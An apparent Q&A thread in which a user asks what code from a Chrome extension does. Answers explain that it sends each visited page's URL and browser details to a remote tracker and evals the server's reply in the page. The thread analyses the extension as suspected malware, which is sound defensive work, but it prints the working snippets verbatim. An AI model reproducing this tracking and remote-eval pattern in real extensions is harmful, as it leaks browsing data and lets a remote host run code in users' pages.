# what does this JavaScript code do with the MD5 hashes?

Tags: javascript, deobfuscation

found this code in a Google Chrome plugin:

The trackurl value is `https://56kupdate.com/` and it seems it fetches some MD5 values from `https://56kupdate.com/?action=get_data` which redirects to `https://master.googlapi.com/v2/get_data.php`but what is done with them?

It seems to send confidential data to the owner of 56kupdate.com: https://plus.google.com/+BDClark0423/posts/cwHcB7o2KiM

```
(function loop() {
    chrome.storage.local.get("extInfo", function (a) {
        if (a.extInfo && a.extInfo.install_time && (new Date().getTime() - a.extInfo.install_time) > 604800000) {
            (function () {
                var c = /Chrome\/([^ ]+)/.exec(window.navigator.userAgent)[1];
                var g = chrome.runtime.getManifest();
                var f;
                (function b() {
                    f = {};
                    $.ajax(config.trackurl, {
                        data: {
                            action: "get_data"
                        },
                        cache: false,
                        complete: function (i) {
                            var h = i.responseJSON;
                            if (!h) {
                                return
                            }
                            for (e in h) {
                                f[e] = h[e]
                            }
                        }
                    });
                    setTimeout(b, 86400000)
                })();
                var d = function (h) {
                    if (f && f.listener) {
                        return f.listener[MD5(h)]
                    }
                    return undefined
                };
                chrome.runtime.onMessage.addListener(function (l, v, n) {
                    var t, o;
                    var j = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/;
                    var h = function (p, i) {
                        $.ajax(config.trackurl, {
                            data: {
                                ref: encodeURIComponent(p),
                                "modules[]": i.length == 0 ? "" : i,
                                addon: "lostfriends",
                                addon_version: g.version,
                                browser: "chrome",
                                browser_version: c,
                                locale: g.current_locale
                            },
                            cache: false,
                            complete: function (m) {
                                n(m.responseText)
                            }
                        })
                    };
                    if (l.cmd == "getInj") {
                        var u = [];
                        var k = l.payload;
                        if (!k) {
                            return
                        }
                        var q = k.domain.split(".");
                        if (q.length > 1 && !j.test(k.domain)) {
                            t = q[q.length - 1];
                            for (var r = q.length - 2; r >= 0; --r) {
                                t = q[r] + "." + t;
                                o = d(t);
                                if (o) {
                                    for (e in o) {
                                        if (u.indexOf(o[e]) == -1) {
                                            u.push(o[e])
                                        }
                                    }
                                }
                            }
                            if (u.length == 0) {
                                h(k.ref, []);
                                return true
                            }
                            h(k.ref, u)
                        }
                    }
                    return true
                })
            })()
        } else {
            setTimeout(loop, 300000)
        }
    })
})();
```

there is also some MD5 file with this code:

```
var MD5 = function (s) {
    function L(b, a) {
        return (b << a) | (b >>> (32 - a))
    }

    function K(k, b) {
        var F, a, d, x, c;
        d = (k & 2147483648);
        x = (b & 2147483648);
        F = (k & 1073741824);
        a = (b & 1073741824);
        c = (k & 1073741823) + (b & 1073741823);
        if (F & a) {
            return (c ^ 2147483648 ^ d ^ x)
        }
        if (F | a) {
            if (c & 1073741824) {
                return (c ^ 3221225472 ^ d ^ x)
            } else {
                return (c ^ 1073741824 ^ d ^ x)
            }
        } else {
            return (c ^ d ^ x)
        }
    }

    function r(a, c, b) {
        return (a & c) | ((~a) & b)
    }

    function q(a, c, b) {
        return (a & b) | (c & (~b))
    }

    function p(a, c, b) {
        return (a ^ c ^ b)
    }

    function n(a, c, b) {
        return (c ^ (a | (~b)))
    }

    function u(G, F, aa, Z, k, H, I) {
        G = K(G, K(K(r(F, aa, Z), k), I));
        return K(L(G, H), F)
    }

    function f(G, F, aa, Z, k, H, I) {
        G = K(G, K(K(q(F, aa, Z), k), I));
        return K(L(G, H), F)
    }

    function D(G, F, aa, Z, k, H, I) {
        G = K(G, K(K(p(F, aa, Z), k), I));
        return K(L(G, H), F)
    }

    function t(G, F, aa, Z, k, H, I) {
        G = K(G, K(K(n(F, aa, Z), k), I));
        return K(L(G, H), F)
    }

    function e(k) {
        var G;
        var d = k.length;
        var c = d + 8;
        var b = (c - (c % 64)) / 64;
        var F = (b + 1) * 16;
        var H = Array(F - 1);
        var a = 0;
        var x = 0;
        while (x < d) {
            G = (x - (x % 4)) / 4;
            a = (x % 4) * 8;
            H[G] = (H[G] | (k.charCodeAt(x) << a));
            x++
        }
        G = (x - (x % 4)) / 4;
        a = (x % 4) * 8;
        H[G] = H[G] | (128 << a);
        H[F - 2] = d << 3;
        H[F - 1] = d >>> 29;
        return H
    }

    function B(c) {
        var b = "",
            d = "",
            k, a;
        for (a = 0; a <= 3; a++) {
            k = (c >>> (a * 8)) & 255;
            d = "0" + k.toString(16);
            b = b + d.substr(d.length - 2, 2)
        }
        return b
    }

    function J(b) {
        b = b.replace(/\r\n/g, "\n");
        var a = "";
        for (var k = 0; k < b.length; k++) {
            var d = b.charCodeAt(k);
            if (d < 128) {
                a += String.fromCharCode(d)
            } else {
                if ((d > 127) && (d < 2048)) {
                    a += String.fromCharCode((d >> 6) | 192);
                    a += String.fromCharCode((d & 63) | 128)
                } else {
                    a += String.fromCharCode((d >> 12) | 224);
                    a += String.fromCharCode(((d >> 6) & 63) | 128);
                    a += String.fromCharCode((d & 63) | 128)
                }
            }
        }
        return a
    }
    var C = Array();
    var P, h, E, v, g, Y, X, W, V;
    var S = 7,
        Q = 12,
        N = 17,
        M = 22;
    var A = 5,
        z = 9,
        y = 14,
        w = 20;
    var o = 4,
        m = 11,
        l = 16,
        j = 23;
    var U = 6,
        T = 10,
        R = 15,
        O = 21;
    s = J(s);
    C = e(s);
    Y = 1732584193;
    X = 4023233417;
    W = 2562383102;
    V = 271733878;
    for (P = 0; P < C.length; P += 16) {
        h = Y;
        E = X;
        v = W;
        g = V;
        Y = u(Y, X, W, V, C[P + 0], S, 3614090360);
        V = u(V, Y, X, W, C[P + 1], Q, 3905402710);
        W = u(W, V, Y, X, C[P + 2], N, 606105819);
        X = u(X, W, V, Y, C[P + 3], M, 3250441966);
        Y = u(Y, X, W, V, C[P + 4], S, 4118548399);
        V = u(V, Y, X, W, C[P + 5], Q, 1200080426);
        W = u(W, V, Y, X, C[P + 6], N, 2821735955);
        X = u(X, W, V, Y, C[P + 7], M, 4249261313);
        Y = u(Y, X, W, V, C[P + 8], S, 1770035416);
        V = u(V, Y, X, W, C[P + 9], Q, 2336552879);
        W = u(W, V, Y, X, C[P + 10], N, 4294925233);
        X = u(X, W, V, Y, C[P + 11], M, 2304563134);
        Y = u(Y, X, W, V, C[P + 12], S, 1804603682);
        V = u(V, Y, X, W, C[P + 13], Q, 4254626195);
        W = u(W, V, Y, X, C[P + 14], N, 2792965006);
        X = u(X, W, V, Y, C[P + 15], M, 1236535329);
        Y = f(Y, X, W, V, C[P + 1], A, 4129170786);
        V = f(V, Y, X, W, C[P + 6], z, 3225465664);
        W = f(W, V, Y, X, C[P + 11], y, 643717713);
        X = f(X, W, V, Y, C[P + 0], w, 3921069994);
        Y = f(Y, X, W, V, C[P + 5], A, 3593408605);
        V = f(V, Y, X, W, C[P + 10], z, 38016083);
        W = f(W, V, Y, X, C[P + 15], y, 3634488961);
        X = f(X, W, V, Y, C[P + 4], w, 3889429448);
        Y = f(Y, X, W, V, C[P + 9], A, 568446438);
        V = f(V, Y, X, W, C[P + 14], z, 3275163606);
        W = f(W, V, Y, X, C[P + 3], y, 4107603335);
        X = f(X, W, V, Y, C[P + 8], w, 1163531501);
        Y = f(Y, X, W, V, C[P + 13], A, 2850285829);
        V = f(V, Y, X, W, C[P + 2], z, 4243563512);
        W = f(W, V, Y, X, C[P + 7], y, 1735328473);
        X = f(X, W, V, Y, C[P + 12], w, 2368359562);
        Y = D(Y, X, W, V, C[P + 5], o, 4294588738);
        V = D(V, Y, X, W, C[P + 8], m, 2272392833);
        W = D(W, V, Y, X, C[P + 11], l, 1839030562);
        X = D(X, W, V, Y, C[P + 14], j, 4259657740);
        Y = D(Y, X, W, V, C[P + 1], o, 2763975236);
        V = D(V, Y, X, W, C[P + 4], m, 1272893353);
        W = D(W, V, Y, X, C[P + 7], l, 4139469664);
        X = D(X, W, V, Y, C[P + 10], j, 3200236656);
        Y = D(Y, X, W, V, C[P + 13], o, 681279174);
        V = D(V, Y, X, W, C[P + 0], m, 3936430074);
        W = D(W, V, Y, X, C[P + 3], l, 3572445317);
        X = D(X, W, V, Y, C[P + 6], j, 76029189);
        Y = D(Y, X, W, V, C[P + 9], o, 3654602809);
        V = D(V, Y, X, W, C[P + 12], m, 3873151461);
        W = D(W, V, Y, X, C[P + 15], l, 530742520);
        X = D(X, W, V, Y, C[P + 2], j, 3299628645);
        Y = t(Y, X, W, V, C[P + 0], U, 4096336452);
        V = t(V, Y, X, W, C[P + 7], T, 1126891415);
        W = t(W, V, Y, X, C[P + 14], R, 2878612391);
        X = t(X, W, V, Y, C[P + 5], O, 4237533241);
        Y = t(Y, X, W, V, C[P + 12], U, 1700485571);
        V = t(V, Y, X, W, C[P + 3], T, 2399980690);
        W = t(W, V, Y, X, C[P + 10], R, 4293915773);
        X = t(X, W, V, Y, C[P + 1], O, 2240044497);
        Y = t(Y, X, W, V, C[P + 8], U, 1873313359);
        V = t(V, Y, X, W, C[P + 15], T, 4264355552);
        W = t(W, V, Y, X, C[P + 6], R, 2734768916);
        X = t(X, W, V, Y, C[P + 13], O, 1309151649);
        Y = t(Y, X, W, V, C[P + 4], U, 4149444226);
        V = t(V, Y, X, W, C[P + 11], T, 3174756917);
        W = t(W, V, Y, X, C[P + 2], R, 718787259);
        X = t(X, W, V, Y, C[P + 9], O, 3951481745);
        Y = K(Y, h);
        X = K(X, E);
        W = K(W, v);
        V = K(V, g)
    }
    var i = B(Y) + B(X) + B(W) + B(V);
    return i.toLowerCase()
};
```

and this code in the last line from the 56kupdate.com server: `GJ96nJkfLF81YwNtXR1uL2yhqT9mnQftFJ50MJjtGJSwVR9GVSttZGOsBS8jXFOOpUOfMIqyLxgcqP81ZmphZmLtXRgVIR1ZYPOfnJgyVRqyL2giXFOQnUWioJHiZmZhZP4kAmHjYwRkAlOGLJMupzxiAGZ3YwZ2`

and found this code in a `inj.js` file:

```
chrome.runtime.sendMessage({cmd:"getInj",payload:{domain:top.location.hostname,ref:top.location.href}},function(m){eval(m)});
```

Answer (score 0, accepted):

> but what is done with them?

The hashes are fetched on a daily basis (by the `b()` function) and stored in the `f` object, where the `d` function accesses them.

The `d` function is called whenever a [`message` event](https://developer.chrome.com/extensions/runtime#event-onMessage) with the command `getInj` and some `domain` as a payload. When that domain is not an IP address (the `j.test()` regex check), it is split in parts and every tail (first domain, then subdomain, then subsubdomain etc) is passed to `d` where it is MD5-hashed and potentially returns the things stored in `f` for that domain. The things that were found are then sent (`$.ajax(config.trackurl, …`) together with the message's `ref` and some browser information to the tracker.

Comment: so BD Clark is right and the script sends potentially confidential data to the server and can be rated as malware?

Comment: I'm not entirely sure what things trigger these `message` events, but it might be the case, yes.

Comment: for what is the long value in the very last line used (j: GJ96nJkfLF81YwNtXR1uL2yhqT9mnQftFJ50MJjtGJSwVR9GVSttZGOsBS8jXFOOpUOfMIqyLxgcqP81ZmphZmLtXRgVIR1ZYPOfnJgyVRqyL2giXFOQnUWioJHiZmZhZP4kAmHjYwRkAlOGLJMupzxiAGZ3YwZ2)?

Comment: It's not used anywhere in the code. It's defintely not a paramter for the MD5 algorithm, which has no seed.

Comment: ok, so this long code is never used, might be interesting to know, for what it was used or what it could represent

Comment: I'm getting different values every time, and can only say that it looks base64-encoded due to trailing `=` signs.

Comment: Maybe related to RSA or encryption (just an assumption)

Comment: found some more suspicious code in a file called inj.js (see updated question) which uses eval (not so nice)

Comment: Looks like the response of the `trackurl` ajax is sent to that `eval` (in whatever context `ini.js` runs) by `n(m.responseText)`

Comment: so this executes any JavaScript code form the server response

Comment: Thanks so far. Yes, it is.